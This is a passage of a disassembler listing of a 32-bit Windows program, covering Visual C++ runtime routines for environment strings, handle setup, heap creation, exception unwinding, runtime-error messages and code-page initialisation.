loc_403175: ; CODE XREF: sub_402FE1+148�j
; sub_402FE1+153�j ...
test esi, esi
jz short loc_40317D
and byte ptr [esi], 0
inc esi
loc_40317D: ; CODE XREF: sub_402FE1+196�j
inc dword ptr [ecx]
jmp loc_40309B
; ---------------------------------------------------------------------------
loc_403184: ; CODE XREF: sub_402FE1+BD�j
; sub_402FE1+D5�j
test edi, edi
jz short loc_40318B
and dword ptr [edi], 0
loc_40318B: ; CODE XREF: sub_402FE1+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_402FE1 endp
; =============== S U B R O U T I N E =======================================
sub_403195 proc near ; CODE XREF: .text:004029AD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_407230
push ebx
push ebp
mov ebp, dword_4050B8
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_4031E3
call ebp ; dword_4050B8
mov esi, eax
cmp esi, ebx
jz short loc_4031C4
mov dword_407230, 1
jmp short loc_4031EC
; ---------------------------------------------------------------------------
loc_4031C4: ; CODE XREF: sub_403195+21�j
call dword_4050BC ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz loc_4032BE
mov dword_407230, 2
jmp loc_403272
; ---------------------------------------------------------------------------
loc_4031E3: ; CODE XREF: sub_403195+19�j
cmp eax, 1
jnz loc_40326D
loc_4031EC: ; CODE XREF: sub_403195+2D�j
cmp esi, ebx
jnz short loc_4031FC
call ebp ; dword_4050B8
mov esi, eax
cmp esi, ebx
jz loc_4032BE
loc_4031FC: ; CODE XREF: sub_403195+59�j
cmp [esi], bx
mov eax, esi
jz short loc_403211
loc_403203: ; CODE XREF: sub_403195+73�j
; sub_403195+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_403203
inc eax
inc eax
cmp [eax], bx
jnz short loc_403203
loc_403211: ; CODE XREF: sub_403195+6C�j
sub eax, esi
mov edi, dword_4050C0
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; dword_4050C0
mov ebp, eax
cmp ebp, ebx
jz short loc_403262
push ebp
call sub_403DA6
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_403262
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; dword_4050C0
test eax, eax
jnz short loc_40325E
push [esp+18h+var_8]
call sub_403D77
pop ecx
mov [esp+18h+var_8], ebx
loc_40325E: ; CODE XREF: sub_403195+B9�j
mov ebx, [esp+18h+var_8]
loc_403262: ; CODE XREF: sub_403195+99�j
; sub_403195+A8�j
push esi
call dword_4050C4 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_4032C0
; ---------------------------------------------------------------------------
loc_40326D: ; CODE XREF: sub_403195+51�j
cmp eax, 2
jnz short loc_4032BE
loc_403272: ; CODE XREF: sub_403195+49�j
cmp edi, ebx
jnz short loc_403282
call dword_4050BC ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz short loc_4032BE
loc_403282: ; CODE XREF: sub_403195+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_403292
loc_403288: ; CODE XREF: sub_403195+F6�j
; sub_403195+FB�j
inc eax
cmp [eax], bl
jnz short loc_403288
inc eax
cmp [eax], bl
jnz short loc_403288
loc_403292: ; CODE XREF: sub_403195+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_403DA6
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_4032A8
xor esi, esi
jmp short loc_4032B3
; ---------------------------------------------------------------------------
loc_4032A8: ; CODE XREF: sub_403195+10D�j
push ebp
push edi
push esi
call sub_402380
add esp, 0Ch
loc_4032B3: ; CODE XREF: sub_403195+111�j
push edi
call dword_4050E8 ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_4032C0
; ---------------------------------------------------------------------------
loc_4032BE: ; CODE XREF: sub_403195+39�j
; sub_403195+61�j ...
xor eax, eax
loc_4032C0: ; CODE XREF: sub_403195+D6�j
; sub_403195+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_403195 endp
; =============== S U B R O U T I N E =======================================
sub_4032C7 proc near ; CODE XREF: .text:0040299D�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_403DA6
mov esi, eax
pop ecx
test esi, esi
jnz short loc_4032E7
push 1Bh
call sub_402A24
pop ecx
loc_4032E7: ; CODE XREF: sub_4032C7+16�j
mov dword_4074E0, esi
mov dword_4075E0, 20h
lea eax, [esi+100h]
loc_4032FD: ; CODE XREF: sub_4032C7+52�j
cmp esi, eax
jnb short loc_40331B
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, dword_4074E0
add esi, 8
add eax, 100h
jmp short loc_4032FD
; ---------------------------------------------------------------------------
loc_40331B: ; CODE XREF: sub_4032C7+38�j
lea eax, [esp+54h+var_44]
push eax
call dword_4050CC ; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_4033F7
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_4033F7
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_403351
mov esi, eax
loc_403351: ; CODE XREF: sub_4032C7+86�j
cmp dword_4075E0, esi
jge short loc_4033AB
mov edi, offset dword_4074E4
loc_40335E: ; CODE XREF: sub_4032C7+DA�j
push 100h
call sub_403DA6
test eax, eax
pop ecx
jz short loc_4033A5
add dword_4075E0, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_40337C: ; CODE XREF: sub_4032C7+CF�j
cmp eax, ecx
jnb short loc_403398
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_40337C
; ---------------------------------------------------------------------------
loc_403398: ; CODE XREF: sub_4032C7+B7�j
add edi, 4
cmp dword_4075E0, esi
jl short loc_40335E
jmp short loc_4033AB
; ---------------------------------------------------------------------------
loc_4033A5: ; CODE XREF: sub_4032C7+A4�j
mov esi, dword_4075E0
loc_4033AB: ; CODE XREF: sub_4032C7+90�j
; sub_4032C7+DC�j
xor edi, edi
test esi, esi
jle short loc_4033F7
loc_4033B1: ; CODE XREF: sub_4032C7+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_4033EE
mov cl, [ebp+0]
test cl, 1
jz short loc_4033EE
test cl, 8
jnz short loc_4033D0
push eax
call dword_4050A0 ; GetFileType
test eax, eax
jz short loc_4033EE
loc_4033D0: ; CODE XREF: sub_4032C7+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, dword_4074E0[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_4033EE: ; CODE XREF: sub_4032C7+EF�j
; sub_4032C7+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_4033B1
loc_4033F7: ; CODE XREF: sub_4032C7+65�j
; sub_4032C7+71�j ...
xor ebx, ebx
loc_4033F9: ; CODE XREF: sub_4032C7+195�j
mov eax, dword_4074E0
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_403454
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_403414
push 0FFFFFFF6h
pop eax
jmp short loc_40341E
; ---------------------------------------------------------------------------
loc_403414: ; CODE XREF: sub_4032C7+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_40341E: ; CODE XREF: sub_4032C7+14B�j
push eax
call dword_4050A4 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
loc_40342A: ; DATA XREF: .rsrc:00423394�r
; .rsrc:loc_4233AF�r ...
jz short loc_403443
push edi
call dword_4050A0 ; GetFileType
test eax, eax
loc_403435: ; DATA XREF: sub_421D8C+3F�r
jz short loc_403443
and eax, 0FFh
loc_40343C: ; DATA XREF: .rsrc:00421CC9�r
; .rsrc:loc_423778�r ...
mov [esi], edi
cmp eax, 2
jnz short loc_403449
loc_403443: ; CODE XREF: sub_4032C7:loc_40342A�j
; sub_4032C7:loc_403435�j
or byte ptr [esi+4], 40h
jmp short loc_403458
; ---------------------------------------------------------------------------
loc_403449: ; CODE XREF: sub_4032C7+17A�j
cmp eax, 3
jnz short loc_403458
or byte ptr [esi+4], 8
jmp short loc_403458
; ---------------------------------------------------------------------------
loc_403454: ; CODE XREF: sub_4032C7+13E�j
or byte ptr [esi+4], 80h
loc_403458: ; CODE XREF: sub_4032C7+180�j
; sub_4032C7+185�j ...
inc ebx
cmp ebx, 3
jl short loc_4033F9
push dword_4075E0
call dword_4050A8 ; SetHandleCount
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_4032C7 endp
; =============== S U B R O U T I N E =======================================
sub_403472 proc near ; CODE XREF: .text:00402988�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call dword_405098 ; HeapCreate
test eax, eax
mov dword_4074C8, eax
jz short loc_4034A7
call sub_403E1A
test eax, eax
jnz short loc_4034AA
push dword_4074C8
call dword_40509C ; HeapDestroy
loc_4034A7: ; CODE XREF: sub_403472+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4034AA: ; CODE XREF: sub_403472+27�j
push 1
pop eax
retn
sub_403472 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034B0 proc near ; CODE XREF: sub_4035A8+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4034C8
push [ebp+arg_0]
call sub_404DA8 ; RtlUnwind
loc_4034C8: ; DATA XREF: sub_4034B0+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4034B0 endp
; =============== S U B R O U T I N E =======================================
sub_4034D0 proc near ; DATA XREF: sub_4034F2+A�o
; .text:00403563�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4034F1
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4034F1: ; CODE XREF: sub_4034D0+10�j
retn
sub_4034D0 endp
; =============== S U B R O U T I N E =======================================
sub_4034F2 proc near ; CODE XREF: sub_4035A8+67�p
; sub_4035A8+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4034D0
push large dword ptr fs:0
mov large fs:0, esp
loc_40350F: ; CODE XREF: sub_4034F2:loc_40354A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40354C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40354C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40354A
push 101h
mov eax, [ebx+esi*4+8]
call sub_403586
call dword ptr [ebx+esi*4+8]
loc_40354A: ; CODE XREF: sub_4034F2+44�j
jmp short loc_40350F
; ---------------------------------------------------------------------------
loc_40354C: ; CODE XREF: sub_4034F2+2A�j
; sub_4034F2+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4034F2 endp
; ---------------------------------------------------------------------------
xor eax, eax
loc_40355C: ; DATA XREF: sub_423A03+3C�r
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4034D0
jnz short locret_40357C
loc_40356C: ; DATA XREF: .rsrc:0042268D�r
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40357C
mov eax, 1
locret_40357C: ; CODE XREF: .text:0040356A�j
; .text:00403575�j
; DATA XREF: ...
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_406F1C
loc_403584: ; DATA XREF: sub_423A03+62�r
jmp short loc_403590
; =============== S U B R O U T I N E =======================================
sub_403586 proc near ; CODE XREF: sub_4034F2+4F�p
; sub_4035A8+78�p
push ebx
push ecx
mov ebx, offset dword_406F1C
mov ecx, [ebp+8]
loc_403590: ; CODE XREF: .text:loc_403584�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
locret_40359B: ; DATA XREF: .rsrc:004220B8�o
retn 4
sub_403586 endp
; ---------------------------------------------------------------------------
align 10h
loc_4035A0: ; DATA XREF: sub_423A03+BD�r
push esi
inc ebx
xor dh, [eax]
loc_4035A4: ; DATA XREF: .rsrc:004225CF�r
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035A8 proc near ; DATA XREF: .text:00402938�o
; sub_40380C+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_403648
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
loc_4035D8: ; DATA XREF: .rsrc:00421FD4�r
; .rsrc:00422647�r
mov edi, [ebx+8]
loc_4035DB: ; CODE XREF: sub_4035A8+90�j
cmp esi, 0FFFFFFFFh
jz short loc_403641
loc_4035E0: ; DATA XREF: .rsrc:00422059�r
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
loc_4035E8: ; DATA XREF: .rsrc:00421FC5�r
; .rsrc:00422636�r
jz short loc_40362F
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
loc_4035F4: ; DATA XREF: sub_42258A+2D�r
pop esi
mov ebx, [ebp+arg_4]
loc_4035F8: ; DATA XREF: .rsrc:00421FA9�r
or eax, eax
jz short loc_40362F
js short loc_40363A
mov edi, [ebx+8]
push ebx
call sub_4034B0
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4034F2
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_403586
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_40362F: ; CODE XREF: sub_4035A8:loc_4035E8�j
; sub_4035A8+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_4035DB
; ---------------------------------------------------------------------------
loc_40363A: ; CODE XREF: sub_4035A8+54�j
mov eax, 0
jmp short loc_40365D
; ---------------------------------------------------------------------------
loc_403641: ; CODE XREF: sub_4035A8+36�j
mov eax, 1
loc_403646: ; DATA XREF: sub_422752�r sub_422752+B�w
jmp short loc_40365D
; ---------------------------------------------------------------------------
loc_403648: ; CODE XREF: sub_4035A8+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
loc_40364E: ; DATA XREF: .rsrc:00421FF9�r
push ebx
call sub_4034F2
add esp, 8
pop ebp
mov eax, 1
loc_40365D: ; CODE XREF: sub_4035A8+97�j
; sub_4035A8:loc_403646�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4035A8 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_4034F2
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_403680 proc near ; CODE XREF: sub_402A24+9�p
; sub_402A49+9�p
mov eax, dword_4070D8
cmp eax, 1
jz short loc_403697
test eax, eax
jnz short locret_4036B8
cmp dword_406C64, 1
jnz short locret_4036B8
loc_403697: ; CODE XREF: sub_403680+8�j
push 0FCh
call sub_4036B9
mov eax, dword_407234
pop ecx
test eax, eax
jz short loc_4036AD
call eax ; dword_407234
loc_4036AD: ; CODE XREF: sub_403680+29�j
push 0FFh
call sub_4036B9
pop ecx
locret_4036B8: ; CODE XREF: sub_403680+C�j
; sub_403680+15�j
retn
sub_403680 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4036B9 proc near ; CODE XREF: sub_402A24+12�p
; sub_402A49+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_406F30
loc_4036CC: ; CODE XREF: sub_4036B9+20�j
cmp edx, [eax]
jz short loc_4036DB
add eax, 8
inc ecx
cmp eax, offset byte_406FC0
jl short loc_4036CC
loc_4036DB: ; CODE XREF: sub_4036B9+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_406F30[esi]
jnz loc_403809
mov eax, dword_4070D8
cmp eax, 1
jz loc_4037E3
test eax, eax
jnz short loc_40370C
cmp dword_406C64, 1
jz loc_4037E3
loc_40370C: ; CODE XREF: sub_4036B9+44�j
cmp edx, 0FCh
jz loc_403809
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call dword_405038 ; GetModuleFileNameA
test eax, eax
jnz short loc_403743
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_402810
pop ecx
pop ecx
loc_403743: ; CODE XREF: sub_4036B9+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_402300
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_403786
lea eax, [ebp+var_1A4]
push eax
call sub_402300
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_4046F0
add esp, 10h
loc_403786: ; CODE XREF: sub_4036B9+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_402810
lea eax, [ebp+var_A0]
push edi
push eax
call sub_402820
lea eax, [ebp+var_A0]
push offset asc_40540C ; "\n\n"
push eax
call sub_402820
push off_406F34[esi]
lea eax, [ebp+var_A0]
push eax
call sub_402820
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_404663
add esp, 2Ch
pop edi
jmp short loc_403809
; ---------------------------------------------------------------------------
loc_4037E3: ; CODE XREF: sub_4036B9+3C�j
; sub_4036B9+4D�j
lea eax, [ebp+arg_0]
lea esi, off_406F34[esi]
push 0
push eax
push dword ptr [esi]
call sub_402300
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_4050A4 ; GetStdHandle
push eax
call dword_405088 ; WriteFile
loc_403809: ; CODE XREF: sub_4036B9+2E�j
; sub_4036B9+59�j ...
pop esi
leave
retn
sub_4036B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40380C proc near ; CODE XREF: sub_402B3C+5E�p
; sub_403BD6+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405450
push offset sub_4035A8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_407238
xor ebx, ebx
cmp eax, ebx
jnz short loc_40387B
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_405448
push esi
call dword_40507C ; GetStringTypeW
test eax, eax
jz short loc_403859
mov eax, esi
jmp short loc_403876
; ---------------------------------------------------------------------------
loc_403859: ; CODE XREF: sub_40380C+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_4070C8
push esi
push ebx
call dword_405080 ; GetStringTypeA
test eax, eax
jz loc_403941
push 2
pop eax
loc_403876: ; CODE XREF: sub_40380C+4B�j
mov dword_407238, eax
loc_40387B: ; CODE XREF: sub_40380C+2F�j
cmp eax, 2
jnz short loc_4038A4
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_40388C
mov eax, dword_407254
loc_40388C: ; CODE XREF: sub_40380C+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword_405080 ; GetStringTypeA
jmp loc_403943
; ---------------------------------------------------------------------------
loc_4038A4: ; CODE XREF: sub_40380C+72�j
cmp eax, 1
jnz loc_403941
cmp [ebp+arg_10], ebx
jnz short loc_4038BA
mov eax, dword_407264
mov [ebp+arg_10], eax
loc_4038BA: ; CODE XREF: sub_40380C+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call dword_405084 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_403941
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_4026C0
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_4022A0
add esp, 0Ch
jmp short loc_403910
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_403910: ; CODE XREF: sub_40380C+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_403941
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_405084 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_403941
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_40507C ; GetStringTypeW
jmp short loc_403943
; ---------------------------------------------------------------------------
loc_403941: ; CODE XREF: sub_40380C+61�j
; sub_40380C+9B�j ...
xor eax, eax
loc_403943: ; CODE XREF: sub_40380C+93�j
; sub_40380C+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
loc_403952: ; DATA XREF: sub_423A03+16�w
; sub_423F3F+53�r
pop ebx
leave
retn
sub_40380C endp
; =============== S U B R O U T I N E =======================================
sub_403955 proc near ; CODE XREF: sub_402E37+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_403966
loc_403962: ; DATA XREF: sub_423A03+57�r
; sub_423F3F+2B�r
add esp, 0Ch
retn
sub_403955 endp
; =============== S U B R O U T I N E =======================================
sub_403966 proc near ; CODE XREF: sub_403955+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_4073C1[eax], cl
jnz short loc_403993
cmp [esp+arg_4], 0
jz short loc_40398C
loc_40397E: ; DATA XREF: sub_421D8C+CA�w
; sub_423BF9+28C�r
movzx eax, word_406C7A[eax*2]
loc_403986: ; DATA XREF: .rsrc:0042336A�w
; .rsrc:004237AF�r ...
and eax, [esp+arg_4]
loc_40398A: ; DATA XREF: .rsrc:0042348C�w
; .rsrc:00423587�w ...
jmp short loc_40398E
; ---------------------------------------------------------------------------
loc_40398C: ; CODE XREF: sub_403966+16�j
xor eax, eax
loc_40398E: ; CODE XREF: sub_403966:loc_40398A�j
; DATA XREF: sub_422F4E+20�w ...
test eax, eax
jnz short loc_403993
locret_403992: ; DATA XREF: sub_422FBD�w sub_422FFA�w ...
retn
; ---------------------------------------------------------------------------
loc_403993: ; CODE XREF: sub_403966+F�j
; sub_403966+2A�j
push 1
pop eax
locret_403996: ; DATA XREF: .rsrc:loc_423242�r
retn
sub_403966 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403997 proc near ; CODE XREF: sub_403D5B+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_40399A: ; DATA XREF: .rsrc:004231DF�w
; .rsrc:00423720�r
sub esp, 18h
push ebx
loc_40399E: ; DATA XREF: .rsrc:00423260�w
; .rsrc:004232AF�r
push esi
push edi
push [ebp+arg_0]
call sub_403B30 ; GetOEMCP
mov esi, eax
loc_4039AA: ; DATA XREF: sub_422F07+8�w
; sub_422F07+36�w ...
pop ecx
cmp esi, dword_407290
mov [ebp+arg_0], esi
jz loc_403B24
loc_4039BA: ; DATA XREF: sub_421D8C+57�r
xor ebx, ebx
cmp esi, ebx
loc_4039BE: ; DATA XREF: sub_423986-8E�r
jz loc_403B1A
xor edx, edx
loc_4039C6: ; DATA XREF: .rsrc:0042381E�w
; sub_423986-33�r
mov eax, offset dword_406FC8
loc_4039CB: ; CODE XREF: sub_403997+41�j
cmp [eax], esi
jz short loc_403A41
add eax, 30h
inc edx
cmp eax, offset dword_4070B8
jl short loc_4039CB
lea eax, [ebp+var_18]
push eax
push esi
call dword_405078 ; GetCPInfo
cmp eax, 1
jnz loc_403B12
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4073C0
cmp [ebp+var_18], 1
mov dword_407290, esi
rep stosd
stosb
mov dword_4074C4, ebx
jbe loc_403B00
cmp [ebp+var_12], 0
jz loc_403AD6
lea ecx, [ebp+var_11]
loc_403A1E: ; CODE XREF: sub_403997+139�j
mov dl, [ecx]
test dl, dl
jz loc_403AD6
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_403A2F: ; CODE XREF: sub_403997+A8�j
cmp eax, edx
ja loc_403ACA
or byte_4073C1[eax], 4
inc eax
jmp short loc_403A2F
; ---------------------------------------------------------------------------
loc_403A41: ; CODE XREF: sub_403997+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4073C0
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_406FD8[esi]
loc_403A5D: ; CODE XREF: sub_403997+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_403A90
loc_403A64: ; CODE XREF: sub_403997+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_403A90
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_403A89
mov edx, [ebp+var_4]
mov dl, byte_406FC0[edx]
loc_403A7E: ; CODE XREF: sub_403997+F0�j
or byte_4073C1[eax], dl
inc eax
cmp eax, edi
jbe short loc_403A7E
loc_403A89: ; CODE XREF: sub_403997+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_403A64
loc_403A90: ; CODE XREF: sub_403997+CB�j
; sub_403997+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_403A5D
mov eax, [ebp+arg_0]
mov dword_4072AC, 1
push eax
mov dword_407290, eax
call sub_403B7A
lea esi, dword_406FCC[esi]
mov edi, offset dword_4072A0
movsd
movsd
pop ecx
mov dword_4074C4, eax
movsd
jmp short loc_403B1F
; ---------------------------------------------------------------------------
loc_403ACA: ; CODE XREF: sub_403997+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_403A1E
loc_403AD6: ; CODE XREF: sub_403997+7E�j
; sub_403997+8B�j
push 1
pop eax
loc_403AD9: ; CODE XREF: sub_403997+14F�j
or byte_4073C1[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_403AD9
push esi
call sub_403B7A
pop ecx
mov dword_4074C4, eax
mov dword_4072AC, 1
jmp short loc_403B06
; ---------------------------------------------------------------------------
loc_403B00: ; CODE XREF: sub_403997+74�j
mov dword_4072AC, ebx
loc_403B06: ; CODE XREF: sub_403997+167�j
xor eax, eax
mov edi, offset dword_4072A0
stosd
stosd
stosd
jmp short loc_403B1F
; ---------------------------------------------------------------------------
loc_403B12: ; CODE XREF: sub_403997+51�j
cmp dword_40723C, ebx
jz short loc_403B28
loc_403B1A: ; CODE XREF: sub_403997:loc_4039BE�j
call sub_403BAD
loc_403B1F: ; CODE XREF: sub_403997+131�j
; sub_403997+179�j
call sub_403BD6
loc_403B24: ; CODE XREF: sub_403997+1D�j
xor eax, eax
jmp short loc_403B2B
; ---------------------------------------------------------------------------
loc_403B28: ; CODE XREF: sub_403997+181�j
or eax, 0FFFFFFFFh
loc_403B2B: ; CODE XREF: sub_403997+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_403997 endp
; =============== S U B R O U T I N E =======================================
sub_403B30 proc near ; CODE XREF: sub_403997+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
